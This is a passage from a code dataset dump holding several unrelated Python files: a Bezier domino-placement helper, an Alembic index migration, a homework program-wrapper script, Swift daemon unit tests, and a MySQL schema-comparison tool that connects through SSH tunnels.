= end_rot\n\tx2, y2 = (end_x, end_y)\n\n\tlength = handle_influence\n\thandle_1_dx = length * math.cos(angle_1)\n\thandle_1_dy = length * math.sin(angle_1)\n\n\thandle_2_dx = length * math.cos(angle_2)\n\thandle_2_dy = length * math.sin(angle_2)\n\n\tP0_x = x1\n\tP0_y = y1\n\n\tP1_x = x1 + (handle_1_dx/2)\n\tP1_y = y1 + (handle_1_dy/2)\n\n\tP2_x = x2 - (handle_2_dx/2)\n\tP2_y = y2 - (handle_2_dy/2)\n\n\tP3_x = x2\n\tP3_y = y2\n\n\tbezier_string = \"M\" + str(P0_x) + \",\" + str(P0_y) + \"C\" + str(P1_x) + \",\" + str(P1_y) + \",\" + str(P2_x) + \",\" + str(P2_y) + \",\" + str(P3_x) + \",\" + 
str(P3_y)\n\n\tbrick_path = bezier_conversion.Bezier(bezier_string)\n\tbrick_path.length_approximation(150.0)\n\n\tdt = 0.01\n\n\tspacing = 14\n\tbricks = int(math.floor(brick_path.length/spacing))\n\n\tspacing = brick_path.length/bricks\n\n\t#print(spacing)\n\n\tbrick_poses = []\n\t#print(brick_path.t_map)\n\n\tfor i in range(bricks+1):\n\t\ttry:\n\t\t\tt = brick_path.t_map[round(i*spacing,3)]\n\t\texcept KeyError:\n\t\t\tt = 1\n\t\t\n\t\tx = brick_path.B_x(t)\n\t\ty = brick_path.B_y(t)\n\t\t\n\t\tx = (x - 60) / 100\n\t\ty = (- y + 120) / 100 - 0.1\n\t\t\n\t\tdy = brick_path.B_y(t + dt) - brick_path.B_y(t - dt)\n\t\tdx = brick_path.B_x(t + dt) - brick_path.B_x(t - dt)\n\t\t\n\t\tangle = math.atan2(dy,dx)\n\n\t\t#print(x, y)\n\t\t\n\t\tnew_pose = Coordinate(x, y, angle)\n\t\tbrick_poses.append(new_pose)\n\t\t# print(brick_poses, brick_poses[-1].x)\n\n\treturn brick_poses\n\n\n","sub_path":"docs/dominoes_code/bezier_interpolation.py","file_name":"bezier_interpolation.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"586098889","text":"# Copyright (C) 2018 Google Inc.\n# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see license file>\n\n\"\"\"\nadd additional acl index\n\nCreate Date: 2018-05-14 02:47:55.761097\n\"\"\"\n# disable Invalid constant name pylint warning for mandatory Alembic variables.\n# pylint: disable=invalid-name\n\n\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = '2795c6d50e62'\ndown_revision = '3db5f2027c92'\n\n\ndef upgrade():\n    \"\"\"Upgrade database schema and/or data, creating a new revision.\"\"\"\n    op.create_index(\n        'ix_person_object',\n        'access_control_list',\n        ['person_id', 'object_type', 'object_id'],\n        unique=False,\n    )\n\n\ndef downgrade():\n    \"\"\"Downgrade database schema and/or data back to the previous revision.\"\"\"\n    op.drop_index('ix_person_object', table_name='access_control_list')\n","sub_path":"src/ggrc/migrations/versions/20180514024755_2795c6d50e62_add_additional_acl_index.py","file_name":"20180514024755_2795c6d50e62_add_additional_acl_index.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"84128012","text":"\"\"\"\nWrite a universal wrapper program that expects its \ncommand line arguments to contain the absolute path \nto any program, followed by its arguments. The wrapper \nshould run that program and report its exit value\n\"\"\"\n\nimport sys\nfrom subprocess import call\n\n\ndef executeExternalProgram(file_path, arguments=None):\n    \"\"\"\n    Constructs a python3 call to a program from command line.\n    First argument is the file path. Subsequent arguments are\n    passed through as arguments.\n    \"\"\"\n    call_command = ['python3', '{file_path}'.format(file_path=file_path)]\n    for arg in arguments:\n        call_command.append(arg)\n    exit_value = call(call_command)\n    if exit_value == 0:\n        print('\\nProgram has successfully run. Exiting.')\n    else:\n        print('\\nProgram has run unsuccessfully with an error.')\n\n\nif __name__ == \"__main__\":\n    if len(sys.argv) < 2:\n        print('No program provided. 
Please provide a filepath to one.')\n else:\n file_path = sys.argv[1]\n executeExternalProgram(sys.argv[1], sys.argv[2:])","sub_path":"homework/homework11/aweise_homework11_cpython.py","file_name":"aweise_homework11_cpython.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"286391419","text":"# Copyright (c) 2010-2012 OpenStack Foundation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# TODO(clayg): Test kill_children signal handlers\n\nimport os\nfrom six import StringIO\nfrom six.moves import reload_module\nimport time\nimport unittest\nfrom getpass import getuser\nimport logging\nfrom test.unit import tmpfile\nimport mock\nimport signal\n\nfrom swift.common import daemon, utils\n\n\nclass MyDaemon(daemon.Daemon):\n\n def __init__(self, conf):\n self.conf = conf\n self.logger = utils.get_logger(None, 'server', log_route='server')\n MyDaemon.forever_called = False\n MyDaemon.once_called = False\n\n def run_forever(self):\n MyDaemon.forever_called = True\n\n def run_once(self):\n MyDaemon.once_called = True\n\n def run_raise(self):\n raise OSError\n\n def run_quit(self):\n raise KeyboardInterrupt\n\n\nclass TestDaemon(unittest.TestCase):\n\n def test_create(self):\n d = daemon.Daemon({})\n self.assertEqual(d.conf, {})\n self.assertTrue(isinstance(d.logger, utils.LogAdapter))\n\n def test_stubs(self):\n d = daemon.Daemon({})\n self.assertRaises(NotImplementedError, d.run_once)\n self.assertRaises(NotImplementedError, d.run_forever)\n\n\nclass TestRunDaemon(unittest.TestCase):\n\n def setUp(self):\n utils.HASH_PATH_SUFFIX = 'endcap'\n utils.HASH_PATH_PREFIX = 'startcap'\n utils.drop_privileges = lambda *args: None\n utils.capture_stdio = lambda *args: None\n\n def tearDown(self):\n reload_module(utils)\n\n def test_run(self):\n d = MyDaemon({})\n self.assertFalse(MyDaemon.forever_called)\n self.assertFalse(MyDaemon.once_called)\n # test default\n d.run()\n self.assertEqual(d.forever_called, True)\n # test once\n d.run(once=True)\n self.assertEqual(d.once_called, True)\n\n def test_signal(self):\n d = MyDaemon({})\n with mock.patch('swift.common.daemon.signal') as mock_signal:\n mock_signal.SIGTERM = signal.SIGTERM\n d.run()\n signal_args, kwargs = mock_signal.signal.call_args\n sig, func = signal_args\n self.assertEqual(sig, signal.SIGTERM)\n with mock.patch('swift.common.daemon.os') as mock_os:\n func()\n self.assertEqual(mock_os.method_calls, [\n mock.call.killpg(0, signal.SIGTERM),\n # hard exit because bare except handlers can trap SystemExit\n mock.call._exit(0)\n ])\n\n def test_run_daemon(self):\n sample_conf = \"[my-daemon]\\nuser = %s\\n\" % getuser()\n with tmpfile(sample_conf) as conf_file:\n with mock.patch.dict('os.environ', {'TZ': ''}):\n with mock.patch('time.tzset') as mock_tzset:\n daemon.run_daemon(MyDaemon, conf_file)\n self.assertTrue(MyDaemon.forever_called)\n self.assertEqual(os.environ['TZ'], 'UTC+0')\n self.assertEqual(mock_tzset.mock_calls, [mock.call()])\n 
daemon.run_daemon(MyDaemon, conf_file, once=True)\n self.assertEqual(MyDaemon.once_called, True)\n\n # test raise in daemon code\n with mock.patch.object(MyDaemon, 'run_once', MyDaemon.run_raise):\n self.assertRaises(OSError, daemon.run_daemon, MyDaemon,\n conf_file, once=True)\n\n # test user quit\n sio = StringIO()\n logger = logging.getLogger('server')\n logger.addHandler(logging.StreamHandler(sio))\n logger = utils.get_logger(None, 'server', log_route='server')\n with mock.patch.object(MyDaemon, 'run_forever', MyDaemon.run_quit):\n daemon.run_daemon(MyDaemon, conf_file, logger=logger)\n self.assertTrue('user quit' in sio.getvalue().lower())\n\n # test missing section\n sample_conf = \"[default]\\nuser = %s\\n\" % getuser()\n with tmpfile(sample_conf) as conf_file:\n self.assertRaisesRegexp(SystemExit,\n 'Unable to find my-daemon '\n 'config section in.*',\n daemon.run_daemon, MyDaemon,\n conf_file, once=True)\n\n def test_run_daemon_diff_tz(self):\n old_tz = os.environ.get('TZ', '')\n try:\n os.environ['TZ'] = 'EST+05EDT,M4.1.0,M10.5.0'\n time.tzset()\n self.assertEqual((1970, 1, 1, 0, 0, 0), time.gmtime(0)[:6])\n self.assertEqual((1969, 12, 31, 19, 0, 0), time.localtime(0)[:6])\n self.assertEqual(18000, time.timezone)\n\n sample_conf = \"[my-daemon]\\nuser = %s\\n\" % getuser()\n with tmpfile(sample_conf) as conf_file:\n daemon.run_daemon(MyDaemon, conf_file)\n self.assertFalse(MyDaemon.once_called)\n self.assertTrue(MyDaemon.forever_called)\n\n self.assertEqual((1970, 1, 1, 0, 0, 0), time.gmtime(0)[:6])\n self.assertEqual((1970, 1, 1, 0, 0, 0), time.localtime(0)[:6])\n self.assertEqual(0, time.timezone)\n finally:\n os.environ['TZ'] = old_tz\n time.tzset()\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/unit/common/test_daemon.py","file_name":"test_daemon.py","file_ext":"py","file_size_in_byte":5784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"454502587","text":"# -*- coding: utf-8 -*-\nfrom sshtunnel import SSHTunnelForwarder \nimport pymysql,sys\nfrom base64 import b64encode,b64decode\nfrom Crypto.Cipher import AES\nfrom Crypto.Util.Padding import pad\nfrom hashlib import blake2b\nimport json\n\n\ndef encrypt_mytext(mytext,input_key):\n h = blake2b(digest_size=16)\n h.update(input_key.encode())\n key=h.hexdigest()\n #print(key)\n data=str(mytext)+\" \"\n cipher = AES.new(b64decode(key), AES.MODE_CBC, iv=b'0123456789abcdef')\n padded_data = pad(data.encode(\"utf-8\"), cipher.block_size)\n encrypt_text = cipher.encrypt(padded_data)\n #print(encrypt_text) \n return b64encode(encrypt_text).decode(\"utf-8\")\n\n\ndef decrypt_mytext(encrypt_text,input_key):\n #print(ciphertext) \n h = blake2b(digest_size=16)\n h.update(input_key.encode())\n key=h.hexdigest()\n #print(key)\n ciphertext = b64decode(encrypt_text.encode(\"utf-8\"))\n cipher= AES.new(b64decode(key), AES.MODE_CBC, iv=b'0123456789abcdef')\n decrypt_text=str(cipher.decrypt(ciphertext).decode(\"utf-8\")).split(' ')[0]\n return decrypt_text\n\ndef read_conn_info(file_name):\n f = open(file_name, 'r')\n line = f.readline()\n encrypt_json=json.loads(line)\n input_enc_key=input(\"enc key: \")\n server_infos_dec={}\n for key,value1 in encrypt_json.items():\n #print(key)\n \n dec_key=decrypt_mytext(key,input_enc_key)\n server_infos_dec[dec_key]={}\n for key2,value2 in value1.items():\n dec_key2=decrypt_mytext(key2,input_enc_key)\n dec_value2=decrypt_mytext(value2,input_enc_key)\n server_infos_dec[dec_key][dec_key2]=dec_value2\n \n return 
server_infos_dec\ndef get_input_val(input_type):\n    while True:\n        input_val=input(input_type+\" 입력하세요: \")\n        if(input_val != ''):\n            return input_val\n        print(\"공백입력은 안됩니다. 다시 입력해주세요.\")\n\ndef InputNumber(min_number,max_number):\n    while True:\n        try:\n            number = int(input(\"숫자를 입력하세요: \"))\n            if(number >=min_number and number <= max_number):\n                return number\n            \n            print(str(min_number)+\"~\"+str(max_number)+\"까지 입력\")\n        except Exception as ex:\n            continue\ndef IsUseTunnel():\n    print(\"###################################################################\")\n    print(\"                 1. 터널링사용\")\n    print(\"                 2. 터널링사용 안함\")\n    input_val = InputNumber(1,2)\n    print(\"###################################################################\")\n    return input_val \ndef MakeTunnel(bastion_ip,bastion_user,bastion_pwd,endpoint):\n    tunnel=SSHTunnelForwarder(\n        (bastion_ip, 22),\n        ssh_username=bastion_user,\n        ssh_password=bastion_pwd,\n        remote_bind_address=(endpoint, 3306)\n    )\n    return tunnel\n\ndef get_server_info(server_infos):\n\n    for key,value in server_infos.items():\n        print(key)\n\n    source_server = get_input_val(\"source_server\")\n    source_schema = get_input_val(\"source_schema\")\n    target_server = get_input_val(\"target_server\")\n    target_schema = get_input_val(\"target_schema\")\n    server_info={}\n    server_info[\"source_bastion_ip\"]=server_infos[source_server][\"source_bastion_ip\"]\n    server_info[\"source_bastion_user\"]=server_infos[source_server][\"source_bastion_user\"]\n    server_info[\"source_bastion_pwd\"]=server_infos[source_server][\"source_bastion_pwd\"]\n    server_info[\"source_endpoint\"]=server_infos[source_server][\"source_endpoint\"]\n    server_info[\"source_db_user\"]=server_infos[source_server][\"source_db_user\"]\n    server_info[\"source_db_pwd\"]=server_infos[source_server][\"source_db_pwd\"]\n    server_info[\"source_schema\"]=source_schema\n    server_info[\"target_bastion_ip\"]=server_infos[target_server][\"source_bastion_ip\"]\n    server_info[\"target_bastion_user\"]=server_infos[target_server][\"source_bastion_user\"]\n    server_info[\"target_bastion_pwd\"]=server_infos[target_server][\"source_bastion_pwd\"]\n    server_info[\"target_endpoint\"]=server_infos[target_server][\"source_endpoint\"]\n    server_info[\"target_db_user\"]=server_infos[target_server][\"source_db_user\"]\n    server_info[\"target_db_pwd\"]=server_infos[target_server][\"source_db_pwd\"]\n    server_info[\"target_schema\"]=target_schema\n    '''\n\n    print(\"다시 입력은 AGAIN_\")\n    input_list=[\"source_bastion_ip\",\n                \"source_bastion_user\",\n                \"source_bastion_pwd\",\n                \"source_endpoint\",\n                \"source_db_user\",\n                \"source_db_pwd\",\n                \"source_schema\",\n                \"target_bastion_ip\",\n                \"target_bastion_user\",\n                \"target_bastion_pwd\",\n                \"target_endpoint\",\n                \"target_db_user\",\n                \"target_db_pwd\",\n                \"target_schema\"]\n    i=0\n    server_info={}\n    while i < len(input_list) :\n        input_val=get_input_val(input_list[i])\n        if(input_val==\"AGAIN_\"):\n            i=0\n            continue\n        server_info[input_list[i]] = input_val\n        i=i+1\n    '''\n\n    return server_info\n\ndef get_connect_info(server_infos):\n    for key,value in server_infos.items():\n        print(key)\n\n    source_server = get_input_val(\"source_server\")\n    source_schema = get_input_val(\"source_schema\")\n    target_server = get_input_val(\"target_server\")\n    target_schema = get_input_val(\"target_schema\")\n    server_info={}\n    server_info[\"source_bastion_ip\"]=server_infos[source_server][\"source_bastion_ip\"]\n    server_info[\"source_bastion_user\"]=server_infos[source_server][\"source_bastion_user\"]\n    
server_info[\"source_bastion_pwd\"]=server_infos[source_server][\"source_bastion_pwd\"]\n server_info[\"source_endpoint\"]=server_infos[source_server][\"source_endpoint\"]\n server_info[\"source_db_user\"]=server_infos[source_server][\"source_db_user\"]\n server_info[\"source_db_pwd\"]=server_infos[source_server][\"source_db_pwd\"]\n server_info[\"source_schema\"]=source_schema\n server_info[\"target_bastion_ip\"]=server_infos[target_server][\"source_bastion_ip\"]\n server_info[\"target_bastion_user\"]=server_infos[target_server][\"source_bastion_user\"]\n server_info[\"target_bastion_pwd\"]=server_infos[target_server][\"source_bastion_pwd\"]\n server_info[\"target_endpoint\"]=server_infos[target_server][\"source_endpoint\"]\n server_info[\"target_db_user\"]=server_infos[target_server][\"source_db_user\"]\n server_info[\"target_db_pwd\"]=server_infos[target_server][\"source_db_pwd\"]\n server_info[\"target_schema\"]=target_schema\n '''\n print(\"다시 입력은 AGAIN_\")\n input_list=[\"source_endpoint\",\n \"source_db_user\",\n \"source_db_pwd\",\n \"source_schema\",\n \"target_endpoint\",\n \"target_db_user\",\n \"target_db_pwd\",\n \"target_schema\"]\n i=0\n server_info={}\n while i < len(input_list) :\n input_val=get_input_val(input_list[i])\n if(input_val==\"AGAIN_\"):\n i=0\n continue\n server_info[input_list[i]] = input_val\n i=i+1\n '''\n return server_info\n\ndef compare_table(source_table_list,target_table_list,source_cursor):\n if len(source_table_list)==0:\n print(\"소스테이블없음\")\n return \"\",\"\"\n elif len(target_table_list)==0:\n print(\"타겟테이블없음\")\n return \"\",\"\"\n\n print(\"###### 테이블 비교 ##########\")\n #print(\"table_name,engine,row_format,table_collation,table_comment\")\n target_not_exists = \"''\"\n source_not_exists = \"''\"\n for source_table in source_table_list:\n sametable_flag=0\n for target_table in target_table_list:\n if source_table[0] == target_table[0]:\n sametable_flag=1\n if source_table != target_table:\n print(\"소스: \"+source_table[0] + ',' + source_table[1] + ',' + source_table[2] + ','+ source_table[3] + ',' + source_table[4])\n print(\"타겟: \"+target_table[0] + ',' + target_table[1] + ',' + target_table[2] + ','+ target_table[3] + ',' + target_table[4])\n if sametable_flag==0:\n target_not_exists=target_not_exists+\",'\"+source_table[0]+\"'\"\n print(\"#\"+source_table[0] + \" 테이블 타겟에 없음\")\n source_cursor.execute(\"show create table %s\"%(source_table[0])) \n print(source_cursor.fetchall()[0][1] + \";\")\n \n for target_table in target_table_list:\n sametable_flag=0\n for source_table in source_table_list:\n if source_table[0] == target_table[0]:\n sametable_flag=1\n if sametable_flag==0:\n source_not_exists=source_not_exists+\",'\"+target_table[0]+\"'\"\n print(\"#\"+target_table[0] + \" 테이블 소스에 없음\")\n print(\"drop table \"+target_table[0]+\";\")\n print(\"###### 테이블 비교 종료##########\")\n return target_not_exists,source_not_exists\n\ndef compare_column(source_column_list,target_column_list):\n \n print(\"###### 컬럼 비교 ##########\")\n #print(\"table_name,column_name,column_type,collation_name,column_comment,column_default\")\n i=0\n for source_column in source_column_list:\n samecolumn_flag=0\n for target_column in target_column_list:\n if source_column[0] == target_column[0] and source_column[1] == target_column[1]:\n samecolumn_flag=1\n if source_column != target_column:\n print(\"#소스: \"+str(source_column[0]) + ',' + str(source_column[1]) + ',' + str(source_column[2]) + ','+ str(source_column[3]) + ',' + str(source_column[4])+ ',' + str(source_column[5])+ 
',' + str(source_column[6])+ ',' + str(source_column[7]))\n print(\"#타겟: \"+str(target_column[0]) + ',' + str(target_column[1]) + ',' + str(target_column[2]) + ','+ str(target_column[3]) + ',' + str(target_column[4])+ ',' + str(target_column[5])+ ',' + str(target_column[6])+ ',' + str(target_column[7]))\n if(str(source_column[6]) == \"YES\"):\n null_option=\" NULL\"\n else:\n null_option=\"NOT NULL\"\n print(\"ALTER TABLE \"+ source_column[0] + \" CHANGE COLUMN `\"+ source_column[1] + \"` \" )\n print(\"`\" + source_column[1] + \"` \"+ str(source_column[2]) + \" \" + null_option + \" \" + str(source_column[7]))\n if(str(source_column[5]) != \"None\" ):\n print(\"default \" + str(source_column[5]) )\n print(\"comment '\" + str(source_column[4]) + \"';\" )\n if samecolumn_flag==0:\n print(\"#\"+source_column[0] + \":\"+source_column[1] + \" 컬럼 타겟에 없음\")\n if(str(source_column[6]) == \"YES\"):\n null_option=\" NULL\"\n else:\n null_option=\"NOT NULL\"\n\n print('ALTER TABLE '+ source_column[0] + \" ADD COLUMN \"+ source_column[1] + \" \" + str(source_column[2]) + \" \" + null_option + \" \" + str(source_column[7]))\n if(str(source_column[5]) != \"None\" ):\n print(\"default \" + str(source_column[5]) )\n\n print(\"comment '\" + str(source_column[4]) + \"'\" )\n print(\"AFTER `\" + source_column_list[i-1][1] + \"`;\")\n\n\n i=i+1\n \n for target_column in target_column_list:\n samecolumn_flag=0\n for source_column in source_column_list:\n if source_column[0] == target_column[0] and source_column[1] == target_column[1]:\n samecolumn_flag=1\n if samecolumn_flag==0:\n print(\"#\"+target_column[0] + \":\"+target_column[1] +\" 컬럼 소스에 없음\")\n print(\"ALTER TABLE \"+target_column[0] + \" drop column `\" + target_column[1] + \"`;\")\n print(\"###### 컬럼 비교 종료##########\")\n\ndef compare_index(source_index_list,target_index_list):\n print(\"###### 인덱스 비교 ##########\")\n #print(\"table_name,index_name,max(NON_UNIQUE) unique_flag,GROUP_CONCAT(index_name order by seq_in_index,',') index_list\")\n for source_index in source_index_list:\n sameindex_flag=0\n for target_index in target_index_list:\n if source_index[0] == target_index[0] and source_index[1] == target_index[1]:\n sameindex_flag=1\n if source_index != target_index:\n print(\"#소스: \"+source_index[0] + ',' + source_index[1] + ',' + str(source_index[2]) + ','+ source_index[3] )\n print(\"#타겟: \"+target_index[0] + ',' + target_index[1] + ',' + str(target_index[2]) + ','+ target_index[3] )\n if source_index[1] == \"PRIMARY\":\n print(\"ALTER TABLE \"+ source_index[0] + \" drop \" + source_index[1] + \" key;\")\n print(\"ALTER TABLE \"+ source_index[0] + \" add \" + source_index[1] + \" key(\" + source_index[3] + \");\")\n else:\n print(\"ALTER TABLE \"+ source_index[0] + \" drop index \" + source_index[1] + \";\")\n print(\"ALTER TABLE \"+ source_index[0] + \" add index \" + source_index[1] + \"(\" + source_index[3] + \");\")\n if sameindex_flag==0:\n print(\"#\"+source_index[0] + \":\"+source_index[1] + \" 인덱스 타겟에 없음\")\n print(\"ALTER TABLE \"+ source_index[0] + \" add index \" + source_index[1] + \"(\" + source_index[3] + \");\")\n \n for target_index in target_index_list:\n sameindex_flag=0\n for source_index in source_index_list:\n if source_index[0] == target_index[0] and source_index[1] == target_index[1]:\n sameindex_flag=1\n if sameindex_flag==0:\n print(\"#\"+target_index[0] + \":\"+target_index[1] +\" 인덱스 소스에 없음\")\n print(\"ALTER TABLE \"+ target_index[0] + \" drop index \" + target_index[1] + \";\")\n print(\"###### 인덱스비교 
종료##########\")\n\ndef compare_routine(source_routine_list,target_routine_list):\n\n if len(source_routine_list)==0 and len(target_routine_list)==0:\n return 0\n\n print(\"###### 루틴 비교(function,procedure) ##########\")\n\n for source_routine in source_routine_list:\n sameroutine_flag=0\n for target_routine in target_routine_list:\n if source_routine[0] == target_routine[0]:\n sameroutine_flag=1\n if source_routine != target_routine:\n print(\"소스: \"+source_routine[0] + ',' + source_routine[1] + ',' + source_routine[2] )\n print(\"타겟: \"+target_routine[0] + ',' + target_routine[1] + ',' + target_routine[2] )\n if sameroutine_flag==0:\n print(source_routine[0] + \" 타겟에 없음\")\n \n for target_routine in target_routine_list:\n sameroutine_flag=0\n for source_routine in source_routine_list:\n #print(source_routine[0] + \",\" + target_routine[0])\n if source_routine[0] == target_routine[0]:\n sameroutine_flag=1\n \n if sameroutine_flag==0:\n print(target_routine[0] + \" 소스에 없음\")\n\ndef compare_colpriv(source_colpriv_list,target_colpriv_list):\n print(\"###### 컬럼권한 비교(function,procedure) ##########\")\n\n for source_colpriv in source_colpriv_list:\n samecolpriv_flag=0\n for target_colpriv in target_colpriv_list:\n if (source_colpriv[0] == target_colpriv[0] \n and source_colpriv[1] == target_colpriv[1]\n and source_colpriv[2] == target_colpriv[2]):\n samecolpriv_flag=1\n if source_colpriv != target_colpriv:\n print(\"소스: \"+source_colpriv[0] + ',' + source_colpriv[1] + ',' + source_colpriv[2]+ ',' + source_colpriv[3]+ ',' + source_colpriv[4] )\n print(\"타겟: \"+target_colpriv[0] + ',' + target_colpriv[1] + ',' + target_colpriv[2]+ ',' + target_colpriv[3]+ ',' + target_colpriv[4] )\n if samecolpriv_flag==0:\n print(source_colpriv[0] + ',' + source_colpriv[1] + ',' + source_colpriv[2]+ ',' + source_colpriv[3]+ ',' + source_colpriv[4] + \" 타겟에 없음\")\n \n for target_colpriv in target_colpriv_list:\n samecolpriv_flag=0\n for source_colpriv in source_colpriv_list:\n if (source_colpriv[0] == target_colpriv[0] \n and source_colpriv[1] == target_colpriv[1]\n and source_colpriv[2] == target_colpriv[2]):\n samecolpriv_flag=1\n if samecolpriv_flag==0:\n print(target_colpriv[0] + ',' + target_colpriv[1] + ',' + target_colpriv[2]+ ',' + target_colpriv[3]+ ',' + target_colpriv[4] + \" 소스에 없음\")\n\ndef compare_schpriv(source_schpriv_list,target_schpriv_list):\n print(\"###### 스키마권한 비교(function,procedure) ##########\")\n\n for source_schpriv in source_schpriv_list:\n sameschpriv_flag=0\n for target_schpriv in target_schpriv_list:\n if (source_schpriv[0] == target_schpriv[0] \n and source_schpriv[1] == target_schpriv[1]):\n sameschpriv_flag=1\n if source_schpriv != target_schpriv:\n print(\"소스: \"+source_schpriv[0] + ',' + source_schpriv[1] + ',' + source_schpriv[2] )\n print(\"타겟: \"+target_schpriv[0] + ',' + target_schpriv[1] + ',' + target_schpriv[2] )\n if sameschpriv_flag==0:\n print(source_schpriv[0] + ',' + source_schpriv[1] + ',' + source_schpriv[2] + \" 타겟에 없음\")\n \n for target_schpriv in target_schpriv_list:\n sameschpriv_flag=0\n for source_schpriv in source_schpriv_list:\n if (source_schpriv[0] == target_schpriv[0] \n and source_schpriv[1] == target_schpriv[1]):\n sameschpriv_flag=1\n if sameschpriv_flag==0:\n print(target_schpriv[0] + ',' + target_schpriv[1] + ',' + target_schpriv[2] + \" 소스에 없음\")\n\ndef compare_tabpriv(source_tabpriv_list,target_tabpriv_list):\n print(\"###### 테이블권한 비교(function,procedure) ##########\")\n\n for source_tabpriv in source_tabpriv_list:\n sametabpriv_flag=0\n for 
target_tabpriv in target_tabpriv_list:\n if (source_tabpriv[0] == target_tabpriv[0] \n and source_tabpriv[1] == target_tabpriv[1]\n and source_tabpriv[2] == target_tabpriv[2]):\n sametabpriv_flag=1\n if source_tabpriv != target_tabpriv:\n print(\"소스: \"+source_tabpriv[0] + ',' + source_tabpriv[1] + ',' + source_tabpriv[2] + ',' + source_tabpriv[3])\n print(\"타겟: \"+target_tabpriv[0] + ',' + target_tabpriv[1] + ',' + target_tabpriv[2] + ',' + target_tabpriv[3])\n if sametabpriv_flag==0:\n print(source_tabpriv[0] + ',' + source_tabpriv[1] + ',' + source_tabpriv[2]+ ',' + source_tabpriv[3] + \" 타겟에 없음\")\n \n for target_tabpriv in target_tabpriv_list:\n sametabpriv_flag=0\n for source_tabpriv in source_tabpriv_list:\n if (source_tabpriv[0] == target_tabpriv[0] \n and source_tabpriv[1] == target_tabpriv[1]\n and source_tabpriv[2] == target_tabpriv[2]):\n sametabpriv_flag=1\n if sametabpriv_flag==0:\n print(target_tabpriv[0] + ',' + target_tabpriv[1] + ',' + target_tabpriv[2]+ ',' + target_tabpriv[3] + \" 소스에 없음\")\n\n\n\n\nif __name__=='__main__':\n try:\n file_name = \"conn_info.json\"\n server_infos=read_conn_info(file_name)\n\n\n TUNNEL_FLAG=0\n CONNECT_FLAG=0\n use_tunnel_flag = IsUseTunnel()\n if(use_tunnel_flag == 1):\n server_info=get_server_info(server_infos)\n\n source_tunnel = MakeTunnel(server_info[\"source_bastion_ip\"],server_info[\"source_bastion_user\"],server_info[\"source_bastion_pwd\"],server_info[\"source_endpoint\"])\n target_tunnel = MakeTunnel(server_info[\"target_bastion_ip\"],server_info[\"target_bastion_user\"],server_info[\"target_bastion_pwd\"],server_info[\"target_endpoint\"])\n source_tunnel.start()\n TUNNEL_FLAG=1\n target_tunnel.start()\n server_info[\"source_connect_ip\"]='127.0.0.1'\n server_info[\"target_connect_ip\"]='127.0.0.1'\n server_info[\"source_connect_port\"]=source_tunnel.local_bind_port\n server_info[\"target_connect_port\"]=target_tunnel.local_bind_port\n print(\"ASIS 터널링포트: \"+str(source_tunnel.local_bind_port)+\" ,TOBE 터널링포트: \" + str(target_tunnel.local_bind_port))\n #터널링 커넥션\n source_conn = pymysql.connect(host='127.0.0.1', port=server_info[\"source_connect_port\"], user=server_info[\"source_db_user\"], password=server_info['source_db_pwd'],db=server_info['source_schema'],charset='UTF8')\n target_conn = pymysql.connect(host='127.0.0.1', port=server_info[\"target_connect_port\"], user=server_info[\"target_db_user\"], password=server_info['target_db_pwd'],db=server_info['target_schema'],charset='UTF8')\n #Source 스키마 리스트 저장\n source_cursor = source_conn.cursor()\n target_cursor = target_conn.cursor()\n CONNECT_FLAG=1\n elif(use_tunnel_flag == 2):\n server_info=get_connect_info(server_infos)\n server_info[\"source_connect_ip\"]=server_info[\"source_endpoint\"]\n server_info[\"target_connect_ip\"]=server_info[\"target_endpoint\"]\n server_info[\"source_connect_port\"]=3306\n server_info[\"target_connect_port\"]=3306\n source_conn = pymysql.connect(host=server_info[\"source_endpoint\"], port=3306, user=server_info[\"source_db_user\"], password=server_info['source_db_pwd'],db=server_info['source_schema'], charset='UTF8')\n target_conn = pymysql.connect(host=server_info[\"target_endpoint\"], port=3306, user=server_info[\"target_db_user\"], password=server_info['target_db_pwd'],db=server_info['target_schema'], charset='UTF8')\n #Source 스키마 리스트 저장\n source_cursor = source_conn.cursor()\n target_cursor = target_conn.cursor()\n CONNECT_FLAG=1\n\n table_list_query = \"select upper(table_name),engine,row_format,table_collation,table_comment from 
information_schema.tables where table_schema='%s'\"\n column_list_query = \"select upper(table_name),upper(column_name),column_type,collation_name,column_comment,column_default,is_nullable,ifnull(extra,'') from information_schema.columns where table_schema='%s' and table_name not in (%s) order by table_schema,table_name,ordinal_position\"\n count_query='select count(1) from %s.%s'\n index_list_query=\"select upper(table_name),upper(index_name),max(NON_UNIQUE) unique_flag,GROUP_CONCAT(column_name order by seq_in_index,',') column_list\\n\" \n index_list_query=index_list_query + \"from information_schema.STATISTICS\\n\"\n index_list_query=index_list_query + \"where table_schema='%s' and table_name not in (%s)\\n\"\n index_list_query=index_list_query + \"group by table_name,index_name\"\n routine_list_query=\"select routine_name,routine_type,md5(ROUTINE_DEFINITION) routine_md5 from information_schema.ROUTINES where routine_schema='%s'\"\n column_privilege_query=\"select grantee,upper(table_name),upper(column_name),privilege_type,is_grantable from information_schema.COLUMN_PRIVILEGES where table_schema='%s'\"\n schema_privilege_query=\"select grantee,privilege_type,is_grantable from information_schema.SCHEMA_PRIVILEGES where table_schema='%s'\"\n table_privilege_query=\"select grantee,upper(table_name),privilege_type,is_grantable from information_schema.TABLE_PRIVILEGES where table_schema='%s'\"\n \n #테이블리스트\n source_cursor.execute(table_list_query%(server_info[\"source_schema\"])) \n source_table_list=source_cursor.fetchall()\n target_cursor.execute(table_list_query%(server_info[\"target_schema\"])) \n 